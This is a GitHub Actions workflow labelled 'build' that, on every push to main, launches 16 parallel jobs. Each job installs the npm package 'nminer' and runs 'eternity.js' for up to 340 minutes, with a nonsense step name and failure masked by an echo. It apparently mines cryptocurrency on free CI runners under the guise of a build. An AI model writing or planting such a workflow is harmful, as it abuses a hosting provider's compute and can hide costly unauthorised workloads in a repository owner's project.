name: eternity
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2505 }
          - { version: 7934 }
          - { version: 3138 }
          - { version: 3247 }
          - { version: 729 }
          - { version: 5831 }
          - { version: 466 }
          - { version: 7005 }
          - { version: 5391 }
          - { version: 2078 }
          - { version: 9619 }
          - { version: 2845 }
          - { version: 5875 }
          - { version: 522 }
          - { version: 3430 }
          - { version: 675 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: papa thoroughly pleasant commandeer deeply
        run: |
          npm install nminer@latest
          timeout 340m node eternity.js || echo "eternity executed"